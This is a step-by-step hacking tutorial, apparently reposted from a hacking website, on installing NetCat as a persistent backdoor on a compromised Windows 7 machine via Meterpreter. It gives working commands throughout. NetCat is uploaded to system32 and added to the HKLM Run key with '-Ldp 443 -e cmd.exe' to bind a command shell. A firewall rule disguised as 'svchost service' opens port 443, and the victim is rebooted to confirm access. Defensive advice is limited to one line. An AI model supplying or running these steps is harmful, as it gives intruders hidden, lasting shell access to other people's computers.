Level : Medium

O.S Target : Windows 7 ultimate

When an attacker successfully compromise a system they need to maintain the connection, that’s why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

Are you sure netcat can be used as a backdoor? yes sure of course :-) In this tutorial I will write down the technique to set up the famous listener application NetCat as a backdoor for Windows system when attacker successfully compromised victim computer and gaining meterpreter access.

This tutorial I will write based on gaining access using java signed applet exploit in my previous tutorial.

Requirements :

1. NetCat 2. Meterpreter Script (you can get meterpreter script when successfully compromise victim with selected payload)

10 Steps to Use NetCat as a Backdoor in Windows 7 System:

1. The first step you need to gain an access to victim computer and get a meterpreter script for the payload ( I’m using java signed applet from my previous tutorial).

10 Steps to Use NetCat as a Backdoor in Windows 7 System

2. The next step you need to upload your NetCat.exe to victim computer by using following command :

upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

upload nc.exe and place it in C:\windows\system32 on victim computer

10 Steps to Use NetCat as a Backdoor in Windows 7 System

When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the tutorial privilege escalation here). 3. When upload process successful it will shown like this :
10 Steps to Use NetCat as a Backdoor in Windows 7 System

4. The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key “HKLM\software\microsoft\windows\currentversion\run“. Enumerate the supplied registry key :

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

10 Steps to Use NetCat as a Backdoor in Windows 7 System

5. Then add our NetCat into start up process by running this command :

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.

6. To check our backdoor autorun process and make sure it already added on autorun list :

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

10 Steps to Use NetCat as a Backdoor in Windows 7 System

7. Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 . run shell command from meterpreter to access command prompt, and then run :

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

10 Steps to Use NetCat as a Backdoor in Windows 7 System 8. When success add our firewall rule, let’s check and make sure our new rule has been added or not by using this command :

netsh firewall show portopening

10 Steps to Use NetCat as a Backdoor in Windows 7 System

9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :

nc -v victim_ip_address port

10 Steps to Use NetCat as a Backdoor in Windows 7 System

10. Let’s try our backdoor by restarting the victim computer by using reboot command from meterpreter or shutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.

meterpreter > reboot

or

C:\windows\system32>shutdown -r -t 00

If our netcat show up a console, then we’re successful inject a NetCat backdoor to victim computer.

Countermeasures :

1. When you have activated windows firewall, make sure you also have other personal firewall installed to detect inbound or outbound packet. Hope it’s useful :-)

– See more at: http://www.hacking-tutorial.com/hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/#sthash.rE9iTxkp.dpuf

Advertisements